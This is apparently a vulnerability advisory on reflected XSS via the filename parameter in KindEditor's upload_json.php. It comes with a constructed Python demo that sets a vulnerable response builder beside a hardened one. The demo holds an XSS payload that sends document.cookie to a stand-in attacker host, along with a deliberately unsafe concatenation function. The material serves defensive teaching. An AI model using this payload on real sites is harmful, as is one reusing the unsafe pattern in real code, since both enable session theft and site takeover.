KindEditor is a lightweight, open source (LGPL), cross-browser, web-based WYSIWYG HTML editor that converts standard text areas into rich text editors. A cross-site scripting (XSS) vulnerability exists in KindEditor prior to version 4.1.x because the affected versions do not handle user input properly: upload_json.php does not filter or escape the filename parameter before reflecting it in its response, so a crafted filename is rendered as markup or script by the browser that receives the response. An attacker who induces a site administrator to submit such an upload could run script in the administrator's browser session, for example to steal the session cookie, and thereby gain site administrator privileges.
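The following is an added illustration of the reflected-filename failure mode described above, placed beside a hardened form. It is not KindEditor's own code: it assumes, for the sake of the example, an upload handler that answers with a small JSON document, echoes the submitted filename in an error message, and serves that document with an HTML content type; the function names, the allow-listed extensions, the upload path and the sample filenames are all constructed for this example.

```python
import html
import json
import re
from posixpath import basename
from typing import Optional

# Constructed sample inputs for the example (not taken from any real upload).
BENIGN_NAME = "report.png"
XSS_NAME = (
    'x.png"><script>document.location="https://attacker.example/?c="'
    "+document.cookie</script>"
)

# Hypothetical allow-list of upload extensions; adjust to the deployment.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "bmp"}
UPLOAD_URL_PREFIX = "/attached/"  # assumed URL prefix, not KindEditor's


def respond_vulnerable(filename: str) -> dict:
    """Unsafe pattern: the client-supplied filename is concatenated straight into
    the response body with no escaping, and the body is served as text/html, so
    a browser renders whatever markup the filename contains."""
    body = '{"error":1,"message":"Invalid file name: ' + filename + '"}'
    return {"content_type": "text/html; charset=utf-8", "body": body}


def safe_name(filename: str) -> Optional[str]:
    """Return a canonical, allow-listed filename, or None if it is unacceptable.

    Path separators are stripped first so '../' tricks cannot escape the upload
    directory, then the remaining name must match a conservative character set
    and carry an allow-listed extension."""
    name = basename(filename.replace("\\", "/"))
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,100}", name):
        return None
    if "." not in name:
        return None
    ext = name.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_EXT:
        return None
    return name


def respond_hardened(filename: str) -> dict:
    """Hardened form: validate the name, build the body with a JSON encoder
    instead of string concatenation, HTML-escape the echoed value so it is inert
    even if client code later inserts the message into the DOM, and declare an
    application/json content type so the browser never treats the body as HTML."""
    name = safe_name(filename)
    if name is None:
        payload = {
            "error": 1,
            "message": "Invalid file name: " + html.escape(filename, quote=True),
        }
    else:
        payload = {"error": 0, "url": UPLOAD_URL_PREFIX + name}
    return {
        "content_type": "application/json; charset=utf-8",
        "body": json.dumps(payload),
    }


def reflects_raw_markup(response: dict, marker: str = "<script>") -> bool:
    """Check a response the way a tester would: does the marker survive verbatim
    in a body that the browser will render as HTML?"""
    return (
        response["content_type"].startswith("text/html")
        and marker in response["body"]
    )


if __name__ == "__main__":
    for label, fn in (("vulnerable", respond_vulnerable), ("hardened", respond_hardened)):
        resp = fn(XSS_NAME)
        print(f"{label}: reflects raw <script>? {reflects_raw_markup(resp)}")
        print("  ", resp["content_type"])
        print("  ", resp["body"])
```

Run as a script, the vulnerable variant reports that the script tag survives verbatim in an HTML-typed body, while the hardened variant rejects the name and returns an escaped message under application/json. Note that the extension allow-list alone does not fix the XSS: the escaping and the content type are what keep a rejected name from executing, and the allow-list is there because an upload endpoint that reflects names usually has file-type checks worth doing at the same time.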